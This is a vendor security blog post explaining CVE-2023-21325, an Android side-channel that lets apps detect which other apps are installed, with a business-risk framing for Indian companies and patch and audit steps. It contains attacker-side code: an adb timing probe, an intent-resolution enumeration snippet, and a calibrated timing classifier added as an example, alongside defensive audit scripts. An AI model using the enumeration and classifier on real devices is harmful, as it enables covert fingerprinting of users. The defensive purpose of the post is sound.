What Happened
In early 2023, a vulnerability was disclosed in Android's Settings application that lets an app on a device determine whether other specific apps are installed, without holding any package-query permission. The flaw, tracked as CVE-2023-21325, is a side-channel information disclosure: exploiting it requires no user interaction and no execution privileges beyond those of an ordinary installed app.
This vulnerability affects millions of Android devices globally. What makes it particularly dangerous is its silent nature: the user sees no prompt and gets no indication that app installation data is being probed. An attacker can run through a list of package names and build an inventory of installed applications, a technique used to fingerprint devices, single out users who run a specific (possibly outdated) app, or decide which malicious payload to deliver.
The vulnerability resides in how the Settings application handles lookups of other packages. Since Android 11, package visibility is filtered: an app only sees the packages it declares in its manifest <queries> element (or everything, if it holds QUERY_ALL_PACKAGES), and a package that is filtered out is supposed to look exactly like one that is not installed. Instead of preserving that indistinguishability, the affected Settings code leaks the answer through an observable difference (timing, error messages, or UI state changes) that reveals whether the app exists on the device.
Why This Matters for Indian Businesses
If you're running an Android app or managing Android devices for your business, CVE-2023-21325 directly impacts your security posture. Here's why this should be on your radar:
DPDP Act Compliance Risk: Under India's Digital Personal Data Protection (DPDP) Act, businesses are required to implement reasonable security measures to protect personal data. An attacker exploiting this vulnerability to enumerate installed apps harvests information about user behaviour, app preferences and device configuration, which can qualify as personal data under DPDP. Note that the probing happens on the user's device, not on your servers: the exposure for your business comes from unpatched devices you manage and from what an attacker can learn about your own app's users. If that data is harvested from devices or users you are responsible for, you face potential non-compliance penalties.
Fintech and Healthcare Impact: If you're in India's booming fintech or healthcare sectors, this is critical. Attackers can detect whether your users have installed competing apps, banking apps, or health monitoring apps—creating a treasure trove of competitive intelligence. RBI's Cyber Security Framework explicitly requires financial institutions to monitor and mitigate such vulnerabilities.
SMB Supply Chain Risk: In my years building enterprise systems, I've seen how vulnerabilities in one vendor's app can cascade through entire ecosystems. If your SMB integrates with third-party Android apps (payment gateways, logistics tracking, HR management), and those apps are vulnerable, your data is at risk.
Technical Breakdown
Let me walk you through how this attack actually works:
graph TD
A[Attacker App Installed] -->|No Permissions Needed| B[Query Settings App]
B -->|Side-Channel Leak| C{Does Target App Exist?}
C -->|Timing Difference| D[App Detected]
C -->|Error Message Leaked| E[App Not Detected]
D -->|Repeat for N Apps| F[Build Device Fingerprint]
E -->|Repeat for N Apps| F
F -->|Send to C&C Server| G[Device Profile Created]
G -->|Exploit Known Vulns| H[Deliver Malware]

The Side-Channel Attack Vector
The vulnerability exploits three main information leakage channels:
1. Timing Side-Channel
When an app queries the Settings framework to check if another app is installed, the response time differs based on whether the app exists:
// Vulnerable code pattern in Android Settings: the caller can observe which
// branch ran, because the failure path builds and unwinds an exception
import android.content.Context;
import android.content.pm.PackageManager;

public final class AppPresenceCheck {
    private final Context context;

    public AppPresenceCheck(Context context) {
        this.context = context;
    }

    public boolean isAppInstalled(String packageName) {
        try {
            // Fast path: the lookup succeeds when the package is present and visible
            context.getPackageManager().getPackageInfo(packageName, 0);
            return true;
        } catch (PackageManager.NameNotFoundException e) {
            // Slow path: the failed lookup raises an exception, which takes measurably longer
            return false;
        }
    }
}

An attacker measures response times to infer app presence:
import subprocess
import time

# Package names to probe (Play Store identifiers)
target_apps = [
    'com.google.android.gms',
    'com.whatsapp',
    'com.paytm.paytmapp',
    'com.amazon.mShop.android',
]

for app in target_apps:
    start = time.monotonic()
    # One lookup per package: 'pm path' resolves a single package name.
    # (From adb the shell user also sees the answer directly: a "package:" line
    # in stdout means installed. An unprivileged on-device app only gets the timing.)
    result = subprocess.run(
        ['adb', 'shell', 'pm', 'path', app],
        capture_output=True, text=True, check=False,
    )
    elapsed = time.monotonic() - start
    # The 0.1 s cutoff is illustrative; a real probe must calibrate it per device
    if elapsed < 0.1:  # Threshold indicates app found
        print(f"[+] Found: {app} ({elapsed:.3f}s)")
    else:
        print(f"[-] Not found: {app} ({elapsed:.3f}s)")

2. Error Message Disclosure
The Settings app returns different error codes when an app doesn't exist vs. when it's hidden:
Query: com.whatsapp
Response: "Package not found" → App doesn't exist
Query: com.hidden.app
Response: "Permission denied" → App exists but hidden

3. Intent Resolution Leakage
Attackers send implicit intents and observe whether the system can resolve them, revealing installed apps:
// Attacker code (runs inside an Activity or Service; no permission requested)
import android.content.Intent;
import android.content.pm.PackageManager;
import android.content.pm.ResolveInfo;
import android.util.Log;
import java.util.List;

// The action string is this page's illustration, not a documented Paytm action
Intent intent = new Intent("com.paytm.ACTION_PAY");
List<ResolveInfo> apps = getPackageManager().queryIntentActivities(
        intent,
        PackageManager.MATCH_DEFAULT_ONLY
);
// A non-empty result means some installed activity handles the action, so the
// app is present. On Android 11+ this result is filtered by package visibility,
// so a correctly behaving system only returns apps the caller declared in <queries>.
if (!apps.isEmpty()) {
    Log.d("ENUM", "Paytm app detected");
}

Real-World Attack Scenario for Indian SMBs
Imagine you run a fintech app in India. An attacker who gets a seemingly harmless app onto a user's device:
- Enumerates the banking and payment apps installed on it (HDFC, ICICI, Paytm, PhonePe)
- Identifies devices running older, vulnerable versions of those apps
- Delivers a trojan tailored to the specific app vulnerabilities found
- Intercepts OTPs and exfiltrates transaction data
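The first step of this scenario is where a fixed single-sample timing cutoff, like the 0.1 s threshold in the earlier probe script, fails on a real device: scheduler jitter swamps a microsecond-scale difference. As an added example that is not part of the original page, the following Python classifier shows how the timing channel is actually read: calibrate the threshold on two packages whose state is already known (the attacker's own package and a name that cannot exist), take the median of repeated lookups to discard spikes, and only then classify targets. The on-device lookup is replaced by a seeded simulator with constructed latencies, so the package names, timings and noise model are assumptions; the classifier itself applies to any measured latencies.

```python
"""Calibrated timing-side-channel classifier for package presence.

Added example, not code from the original page. A real probe needs an
unprivileged app running on the device to time its own lookups; here the
lookup latencies come from a seeded simulator (constructed data) that follows
the page's model: a lookup of a present package returns faster than one that
ends in a NameNotFoundException. Package names, latencies and noise are
assumptions.
"""
import random
import statistics


class SimulatedDevice:
    """Stand-in for the on-device lookup. Installed set and timings are assumed."""

    def __init__(self, installed, seed=1):
        self.installed = set(installed)
        self.rng = random.Random(seed)

    def lookup_latency_us(self, package):
        # Present: ~120 us, absent: ~400 us (exception path), plus Gaussian jitter
        # and occasional scheduling spikes that a single sample would misread.
        base = 120.0 if package in self.installed else 400.0
        sample = base + self.rng.gauss(0, 40)
        if self.rng.random() < 0.05:
            sample += self.rng.uniform(500, 2000)
        return sample


def measure(device, package, n=15):
    """Median of n lookups: the median discards the spikes a mean would absorb."""
    return statistics.median(device.lookup_latency_us(package) for _ in range(n))


def calibrate(device, known_present, known_absent, n=15):
    """Derive the decision threshold from packages whose state is already known.

    An attacker can always calibrate on its own package name (present) and on a
    random name that cannot exist (absent); no fixed cutoff like '0.1 s' is needed.
    """
    t_present = measure(device, known_present, n)
    t_absent = measure(device, known_absent, n)
    if t_present >= t_absent:
        raise RuntimeError("no usable timing gap: channel closed or too noisy")
    return (t_present + t_absent) / 2


def fingerprint(device, packages, threshold, n=15):
    """Classify each package as installed (True) or not from its median latency."""
    return {pkg: measure(device, pkg, n) < threshold for pkg in packages}


if __name__ == "__main__":
    # Constructed device: two real package names plus the attacker's own app
    dev = SimulatedDevice({"com.whatsapp", "com.paytm.paytmapp", "com.attacker.probe"})
    thr = calibrate(dev, "com.attacker.probe", "com.does.not.exist.zz")
    print(f"threshold ~ {thr:.0f} us")
    targets = ["com.whatsapp", "com.phonepe.app", "com.paytm.paytmapp"]
    for pkg, present in fingerprint(dev, targets, thr).items():
        print(f"[{'+' if present else '-'}] {pkg}")
```

The check in calibrate doubles as the defender's test: once a patch removes the timing gap, calibration fails outright instead of producing confident but wrong fingerprints.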
How to Protect Your Business
| Protection Layer | Action | Difficulty |
|---|---|---|
| Immediate | Apply Android security patches (March 2023+) | Easy |
| Code Level | Implement proper permission checks in apps | Medium |
| Architecture | Require Android 11+ with package visibility filtering (declare <queries> instead of QUERY_ALL_PACKAGES) | Medium |
| Monitoring | Audit app permissions with VAPT scans | Medium |
| Compliance | Document DPDP compliance for app security | Hard |
Step 1: Update Immediately
If you're managing Android devices, apply the latest security patches:
# Check current Android version
adb shell getprop ro.build.version.release
# Check security patch level
adb shell getprop ro.build.version.security_patch
# Should be March 2023 or later for the CVE-2023-21325 fix

Step 2: Restrict Query Visibility (Android 11+)
If you develop Android apps, declare the specific packages you need to see in a <queries> element instead of requesting QUERY_ALL_PACKAGES. Note that <queries> is a direct child of <manifest>, not of <application>:
<!-- AndroidManifest.xml -->
<manifest xmlns:android="http://schemas.android.com/apk/res/android">

    <!-- Avoid QUERY_ALL_PACKAGES: it makes every installed package visible to
         your app, and Google Play only permits it for approved use cases. -->
    <!-- <uses-permission android:name="android.permission.QUERY_ALL_PACKAGES" /> -->

    <!-- Declare only the packages (and intents) you actually need to resolve -->
    <queries>
        <package android:name="com.paytm.paytmapp" />
        <package android:name="com.google.android.gms" />
    </queries>

    <application>
        <!-- your components -->
    </application>
</manifest>

Step 3: Audit Installed Apps
Regularly audit which apps are installed on corporate devices:
# List all installed packages
adb shell pm list packages
# Filter for specific app
adb shell pm list packages | grep paytm
# Get detailed app info
adb shell dumpsys package com.paytm.paytmapp

Step 4: Monitor for Suspicious Behavior
Watch for apps attempting to enumerate other apps without permission:
# Monitor logcat for suspicious intents
adb logcat | grep -i "intent\|resolve\|package"
# List third-party apps that hold QUERY_ALL_PACKAGES (an install-time permission,
# so the package dump shows it as "granted=true" under install permissions)
for p in $(adb shell pm list packages -3 | tr -d '\r' | cut -d: -f2); do
  adb shell dumpsys package "$p" | grep -q 'QUERY_ALL_PACKAGES: granted=true' && echo "$p"
done

Step 5: Implement Defense-in-Depth
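Checking Steps 1, 3 and 4 by hand does not scale beyond a handful of devices. As an added example that is not part of the original page, the following Python script audits saved adb output from a whole fleet offline: it parses each device's security patch level against the March 2023 baseline the page recommends, diffs the installed third-party packages against an allowlist, and flags any package whose dumpsys dump shows QUERY_ALL_PACKAGES granted. The device names, the allowlist and the package com.example.sideloaded are constructed, and the script assumes you export the three adb outputs per device through your MDM or a shell loop.

```python
"""Offline fleet audit of saved adb output (Steps 1, 3 and 4 of this page).

Added example, not code from the original page. It assumes that for each
managed device you have captured, via your MDM or a script, the text output of:
  adb shell getprop ro.build.version.security_patch
  adb shell pm list packages -3
  adb shell dumpsys package <pkg>      (one dump per third-party package)
The sample output below is constructed; the allowlist and the hostile package
name are assumptions.
"""
import re
from datetime import date

# Patch level this page recommends as the minimum for the CVE-2023-21325 fix
MIN_PATCH_LEVEL = date(2023, 3, 1)

# Assumed allowlist of third-party packages approved on corporate devices
APPROVED_PACKAGES = {"com.whatsapp", "com.paytm.paytmapp"}


def parse_patch_level(getprop_output):
    """Parse the YYYY-MM-DD date printed by getprop ro.build.version.security_patch."""
    m = re.search(r"(\d{4})-(\d{2})-(\d{2})", getprop_output)
    if not m:
        raise ValueError(f"no patch date in {getprop_output!r}")
    return date(*(int(g) for g in m.groups()))


def parse_package_list(pm_output):
    """Collect package names from the 'package:<name>' lines of pm list packages."""
    return {
        line.split(":", 1)[1].strip()
        for line in pm_output.splitlines()
        if line.strip().startswith("package:")
    }


def holds_query_all_packages(dumpsys_output):
    """True if a package dump shows QUERY_ALL_PACKAGES granted.

    It is an install-time (normal) permission, so it appears in the
    'install permissions:' block of dumpsys package as '<name>: granted=true'.
    """
    return re.search(r"android\.permission\.QUERY_ALL_PACKAGES:\s*granted=true",
                     dumpsys_output) is not None


def audit_device(device_id, getprop_output, pm_output, dumpsys_by_pkg):
    """Return the list of findings for one device; an empty list means it passed."""
    findings = []
    patch = parse_patch_level(getprop_output)
    if patch < MIN_PATCH_LEVEL:
        findings.append(f"{device_id}: patch level {patch} predates {MIN_PATCH_LEVEL}")
    for pkg in sorted(parse_package_list(pm_output) - APPROVED_PACKAGES):
        findings.append(f"{device_id}: unapproved package {pkg}")
    for pkg, dump in sorted(dumpsys_by_pkg.items()):
        if holds_query_all_packages(dump):
            findings.append(f"{device_id}: {pkg} holds QUERY_ALL_PACKAGES")
    return findings


# Constructed sample captures for two devices (not real data)
SAMPLE_FLEET = {
    "pixel-01": {
        "getprop": "2023-05-05\n",
        "pm": "package:com.whatsapp\npackage:com.paytm.paytmapp\n",
        "dumpsys": {
            "com.whatsapp": "    install permissions:\n"
                            "      android.permission.INTERNET: granted=true\n",
        },
    },
    "byod-17": {
        "getprop": "2022-11-05\n",
        "pm": "package:com.whatsapp\npackage:com.example.sideloaded\n",
        "dumpsys": {
            "com.example.sideloaded": "    install permissions:\n"
                                      "      android.permission.INTERNET: granted=true\n"
                                      "      android.permission.QUERY_ALL_PACKAGES: granted=true\n",
        },
    },
}


def run_audit(fleet=SAMPLE_FLEET):
    """Audit every device and return {device_id: [findings]}."""
    return {
        dev: audit_device(dev, cap["getprop"], cap["pm"], cap["dumpsys"])
        for dev, cap in fleet.items()
    }


if __name__ == "__main__":
    for dev, findings in run_audit().items():
        print(f"{dev}: {'OK' if not findings else ''}")
        for f in findings:
            print("  " + f)
```

Feed it real captures by replacing SAMPLE_FLEET with whatever your MDM exports; the three parsers only depend on the plain-text formats of getprop, pm and dumpsys.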
Don't rely on OS-level fixes alone. If your own app exposes an "is app X installed?" facility (for example through an exported component or a WebView JavaScript bridge), make sure it cannot be used as an oracle for arbitrary package names:
import android.content.Context;
import android.content.pm.PackageManager;
import java.util.Set;

// Secure pattern: only answer presence queries for an explicit allowlist
public final class SecureAppDetection {
    // Allowlist of the only packages this app has a business reason to check
    private static final Set<String> ALLOWED_QUERIES = Set.of(
            "com.paytm.paytmapp",
            "com.google.android.gms"
    );

    private final Context context;

    public SecureAppDetection(Context context) {
        this.context = context.getApplicationContext();
    }

    public boolean isAppInstalled(String packageName) {
        // Refuse anything outside the allowlist so no information leaks about other apps
        if (!ALLOWED_QUERIES.contains(packageName)) {
            return false;
        }
        try {
            context.getPackageManager().getPackageInfo(packageName, 0);
            return true;
        } catch (PackageManager.NameNotFoundException e) {
            return false;
        }
    }
}

Bottom Line
CVE-2023-21325 is a reminder that even "local" vulnerabilities can have serious consequences. In my experience reviewing hundreds of Indian SMB security postures, I've found that most businesses aren't systematically checking for these types of flaws—and attackers know it.
The good news: you can fix this today. Apply patches, audit your apps, and implement proper permission controls. It's not glamorous security work, but it's the kind that actually stops real attacks.
Next step: Run a free VAPT scan on your Android infrastructure. Takes 15 minutes. Could save you from a breach that costs lakhs in remediation and DPDP penalties.
Originally reported by: NIST NVD
Written by Shouvik Mukherjee, Founder & CEO of Bachao.AI. Follow me on LinkedIn for daily cybersecurity insights for Indian businesses.
Protect your business with Bachao.AI — India's automated vulnerability assessment and penetration testing platform. Get a comprehensive security scan of your web applications and infrastructure. Visit Bachao.AI to get started.
Frequently Asked Questions
What is CVE-2023-21325? CVE-2023-21325 is a side-channel information disclosure in Android that lets an app on the device find out whether another package is installed without holding the permission needed to query it, with no user interaction and no extra privileges. It was publicly disclosed and patched by Google through the Android Security Bulletin process.
Why does this affect Indian SMBs? Indian SMBs increasingly rely on Android devices for business operations, from mobile banking to customer communication. Many organizations run BYOD policies with unpatched devices, making them prime targets for attackers exploiting known vulnerabilities like CVE-2023-21325.
How can I protect my organization? Ensure all Android devices in your organization are updated to the latest security patch level. Implement an MDM solution to enforce patch compliance, conduct regular VAPT assessments via platforms like Bachao.AI by Dhisattva AI Pvt Ltd, and align with CERT-In guidelines for incident reporting.